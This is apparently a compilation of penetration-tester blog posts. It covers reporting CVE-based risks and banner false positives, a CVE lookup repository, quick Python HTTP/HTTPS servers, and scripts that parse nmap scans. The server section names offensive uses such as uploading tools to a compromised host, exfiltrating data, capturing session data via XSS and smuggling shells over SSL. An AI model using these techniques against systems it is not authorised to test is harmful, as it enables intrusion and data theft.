    3. In both scenarios you can present the most significant risks with fuller write ups. Go out looking for exploit code to help quantify the exploitability of the service, and present a statistical summary.
    4. For example, “The service had 200 known weaknesses within the CVE database. Of those X were in the high risk range, Y were in the the medium risk range, and Z were in the low risk range. The consultant would advise special attention is paid to CVE-….-…. and CVE-….-…. which allow remote code execution, and denial of service respectively.”

Following that process should get what you want in your reports.

A word on false positives

The above process is pretty simple. There is one massive caveat that you will need to be aware of. That process is, more often than not, based on the service banner returned by your target.

If the OS uses “backporting” to supply security updates, or the admin has mucked about, then the banner number will not necessarily reflect the target’s exploitability. In this case we can get into “false positives”. A quick Google gives us the following definition:

Definition of a false positive – Circa Christmas 2016

If the target is reporting a service banner which is inaccurate when clashed against the vendor’s official release history. Then your results will be inaccurate and you have a false positive.

If we are testing in a black-box scenario we have no access to the underlying operating system by default and cannot fully confirm the banner status in many cases.

What to do? Ensure that your report includes phrases like these:

  1. Vulnerability based on service banner only.
  2. Potential false positive result.
  3. Impact and risk based on assumption that banner was accurate as this is the worst case scenario.

The first line of your recommendations section should definitely be “Conduct an investigation to ensure that the service is vulnerable”. Be sure that you convey these sentiments on all phone calls with your customer and they should learn to trust the other results more as they do not have them!

With that caveat dealt with by the language in your report you can be sure to prevent awkward phone calls when customers call up going “we looked into it, and it was NOT vulnerable.”

Experience tells me that even if you include these caveats you have to justify yourself sometimes. Be aware of it coming by preparing some polite reasons to give.

Using CVE-Offline

It is pretty simple to obtain CVE-Offline. Just clone the git down:

git clone https://github.com/cornerpirate/cve-offline.git

You can then use your platforms “grep” of choice to find a CVE in the “cve-summary.csv” file. For example, lets look for “CVE-2016-0142” do the following:

grep "CVE-2016-0142" cve-summary.csv
CVE-2016-0142,9.3,"Video Control in Microsoft Windows Vista SP2, Windows 7 SP1, Windows 8.1, Windows RT 8.1, and Windows 10 Gold, 1511, and 1607 allows remote attackers to execute arbitrary code via a crafted web page, aka ""Microsoft Video Control Remote Code Execution Vulnerability."""

This has given you a comma separated line of output that you can now work with. The format of this line is:


You can pipe that bad boy into a .csv file, open it in excel and make pretty tables that you can paste into your report. You are welcome.

Updating CVE-Offline

I update the repository once a month from the nist export feeds. You can get the raw data from here if you want:


Otherwise you basically need to use git to update once a month. Enter your local “cve-offline” directory and do this:

git pull

Personally I have often forgotten how the heck to update a repository I use. So there you are, it is written down!

Simple HTTP/HTTPS Servers in Python

There are loads of situations where you need a quick way to spin up an HTTP server. The following are just off the top of my head but I bet you can all think of more:

  • You have established a shell and you want to upload tools to your new computer.
  • You want to exfil data back out of an environment.
  • You have found an XSS and you want to prove you can get useful data out of a victim’s session easily.
  • You want to host a JavaScript file to prove the dangers of poor Transport Layer Security or sites which host files on 3rd party hosts.

In these situations configuring Apache is overkill and you probably only want a simple service which will last a matter of minutes. I am going full Python for this one and I have reworked this post to include Python3 syntax to keep it current in 2018.

Don’t Run with Scissors

The HTTP and HTTPS listeners that I show in this post will share the contents of the folder where you run them. As with all situations “BE AWARE OF WHAT IS IN YOUR WEB ROOT“. If you are starting a listener on the Internet then it will be port scanned within 30 minutes, and you will see automated attackers spamming your logs.

Before you run any of these services take a moment to consider where you are running them. I usually create a folder in “/tmp/” for an engagement such as “/tmp/safeplace” since this will not persist for very long.

Additionally, these servers have Directory Listings enabled by default. If you want to limit what can be seen it is a good idea to create an “index.html” file in your folder. That way your assailant will be forced to use Dirbuster which gets noisy.

Simple HTTP Server (Python 2)

For most situations this is my goto move:

python -m SimpleHTTPServer <port> # Syntax
python -m SimpleHTTPServer 8080   # Example

When you run this it starts to log things to the console as shown:


By default you get the IP address of the client. Then the files and response codes.

Simple HTTP Server (Python 3)

Python 3 is the future!!! They have renamed the module to “http.server”. Time to update your tools to do this:

python3 -m http.server <port> # Syntax
python3 -m http.server 8080   # Example

Which does very similar things as shown below:


Not a lot different really.

Generating Keys and Certificates for HTTPS

Sometimes you need to use HTTPS. The two best cases are:

  1. To Gain Privacy – if your target has traffic inspection but they do not terminate SSL then you can genuinely smuggle shells through SSL. I have seen a customer network which would catch plain-text but did nothing about an HTTPS connection.
  2. To Avoid Browser Mixed Content Warnings – these warnings can hinder a decent proof of concept. If you are trying something that “should be working goddamn it!”. Consider looking at the developer tools for your web browser and look for mixed content exceptions.

Whatever your motivation the HTTPS services I show will rely on you having a “privatekey.pem” and “cert.pem” file. You can generate these with openssl using the commands below:

openssl genrsa > privatekey.pem
openssl req -new -x509 -key privatekey.pem -out cert.pem -days 365

You will be prompted to enter information to populate the fields of your self-signed SSL certificate. I stuff those with spam for proof of concepts. If I was engaged in a phishing exercise then a legit SSL certificate is the right move. 

Simple HTTPS Server (Python 2)

I really liked “twisted” because it can do a *lot* of things. First you will need to install that using python’s pip package manager as shown:

pip install twisted

You can then start an HTTPS service using the command below:

twistd web --https=<port> --path=. -c </path/to/cert.pem> -k </path/to/privatekey.pem> #Syntax
twistd web --https=8443 --path=. -c cert.pem -k privatekey.pem                         #Example

Twisted automatically creates a logfile called “twisted.log” in the current directory it does not want to echo to stdout so you need to use:

tail -f twisted.log

The “-f” means read this file when it changes. The following shows what this means:


The content of the output includes User-Agents and more debugging related to SSL but is otherwise similar to “SimpleHTTPServer”.

Simple HTTPS Server (Python 3)

Python 3 is the future!!! Python 3 is the future!!! Python 3 is the future!!!

Again there are minor differences between python 2 and 3. This time you have to use “pip3” to install Twisted:

pip3 install twisted

If you already have “twisted” installed for python 2 this can get a bit confusing. Running the above seems to clobber the version in the path. When you run “which twistd” you will be pointed at the python3 version. Don’t trust me? Check the first line of that file:


Great. So is the syntax to run the server different? Fortunately not in my test the following worked just fine once more:

twistd web --https=<port> --path=. -c </path/to/cert.pem> -k </path/to/privatekey.pem> #Syntax
twistd web --https=8443 --path=. -c cert.pem -k privatekey.pem                         #Example

Hope that saves you some time when you want a simple HTTPS server!

Take care

Working with nmap-summariser & nmap-grepper

We all love nmap right? Once you get through that learning spike at the start¬†that is. Once¬†you are happily battering out “-sS -sV -A -Pn ..” you feel like you have made it as a hacker. ¬†Not quite there yet? Practice kiddo.

A tool for nearly every challenge.

Finder of ports. Enumerator of versions. Confirmer of many vulnerabilities. Friend. Ally. For some of the hackers afraid of human contact I might even guess at… “lover”? But that is idle speculation.

The tl; dr version of this blog post is simply that there is a github repository here:


Clone it and play with the python scripts if that is what you want to do. Thanks for coming!

Some of you are reading on? Ok then. I will mention both of the scripts and why they exist.

Create Some Nmap Results

Before proceeding I need to have some results to play with. Lets port scan google.com because they are the heroes we need and can take it.

Here is the command that was run:

nmap -sS -sV -Pn -oA nmap-google.com -v www.google.com
Nmap scan report for www.google.com (
Host is up (0.0080s latency).
Other addresses for www.google.com (not scanned): 2a00:1450:4009:805::2004
rDNS record for lhr35s03-in-f4.1e100.net
Not shown: 998 filtered ports
80/tcp open http
443/tcp open ssl/https
2 services unrecognized despite returning data.

I beg the courts indulgence to explain the flags:

  1. -sS – A TCP SYN Scan. A privileged command so you need to have root privileges.
  2. -sV – Conduct a version scan. When nmap knows your service the “service” and “version” and”extra” parts of the output and XML files are populated with juicy details.
  3. -oA – Output to all three common nmap formats.
    1. “.nmap” – as shown in the above example.
    2. “.xml” – an XML file that nmap-summariser and nmap-grepper use.
    3. “.gnmap” – greppable nmap format. Comma separated variables.
  4. -v – Be a little verbose. Just a little.

The core bit here is that you must export the XML file format to use the tools I am talking about later. The optional part is using “-sV” to get more information to play with.


I made this to meet a need I had when writing a report. You pass it an nmap “.xml” file and it will spit out the data. Primarily I published this code so that someone had a simple baseline Python script that they could manipulate the output of easily to match whatever they needed. Funnily enough, nmap-grepper exists because it turned out¬†I needed it!

This is not really meant to be used by people, but it had the hooks in the right places of the XML file so you could simply alter what you printed out to match your needs.

How does it work? Hackers are often curious so lets peek under the hood:

The for loop to look at

This is the key part of the script. The code above line 48 gets a reference to the XML file as an object and allows us to pick out specific XML nodes to get data from. To understand the for loop we need to know a little bit about the XML file format.

Here is a high level view of the XML structure:

 <scaninfo> Information related to how the scan was configured </scaninfo>
 <host> all data about host A </host>
 <host> all data about host B </host>
 <host> all data about host C </host>
 <runstats> Information about how long it took to run etc. </runstats>

The key part to note is that there is one or more “<host>” tags. Each IP address in your scan will be represented by a “<host>” tag. I have showed three to get the point across. Of-course our XML file from scanning google.com will have only one “<host>” tag.

Lets look at that for loop again. As I think of myself as a nice guy here it is below:

Hey, it is that for loop again!

You can probably tell that this for loop is now essentially going through every “<host>” tag. Lines 49 and 50 are then getting access to a child node and then an attribute of that child node respectively. This is shown below:

Marrying the XML to the Python Code

I haven’t made my script amazingly robust. You might find errors at line 49 if it somehow does not have an entry at position [0].¬†It may also behave unexpectedly on an IPv6 network at line 50. Who knows?

For more information there is no substitute for opening your “nmap-google.com.xml” file in a text editor, and viewing the nmap-summariser.py script to see which tags/attributes it picks out:


For bonus points. Modify your script to display output in this format:


You will need to find a target, and re-run nmap with “-O” to force an operating system guess.

You will have to heavily modify the output lines to achieve this, and my script doesn’t even vaguely touch the OS tags so you have to find them in the XML. Happy hunting!


I went onsite and had a need to grep ports very quickly since there was a lot of data to sift through. So I modified “nmapsummariser.py” and ended up with “nmapgrepper.py”:


Why does this exist when nmap outputs a “.gnmap” which is greppable? ¬†Well, because that isn’t very greppable! Is the answer. The “.gnmap” format uses one line per host which can include any number of services. It gets very messy to work with very quickly.

So what does “nmapgrepper.py” do ? It simply flips it so you get a port/service view instead of a host view. Like this:

Output of nmapgrepper.py

With one host that only has two services we do not have much to work with here. Imagine this blown up to an internal network which has thousands of internal services. You can use “grep” and “cut” very quickly to interact with this file format. Want to find all “http”services ?

Using grep to list only http services

A simple grep will give you all services that operate on plain-text HTTP.

Want to just store the IP addresses that have “http” ? Go for a cut mate, like this:

Using cut to display only the IP

There you go you can now  slice and dice an nmap scan to focus on particular services quickly. May no FTP service permit anonymous logins without you knowing about it.

When tackling a massive network I try to take a service approach first because a few common flaws will “get you in” most times. If that isn’t working flipping your attention to individual hosts that have some interesting services you can enumerate will often yield results.

If you want another coding challenge here then why not make “nmapgrepper.py” spit out this format instead:


That means more opportunities for greppability. Find me all things running Microsoft Server 2008? Show me any host with “dev” or “test” in the hostname? These are things you will be able to answer if you do.

Note: you can achieve the same effect with metasploit if you have enabled the Postgres database. Your reading for that is 100% this URL:


I don’t claim nmapgrepper is better. It is just sometimes fun to roll your own to know more.

Hope that helps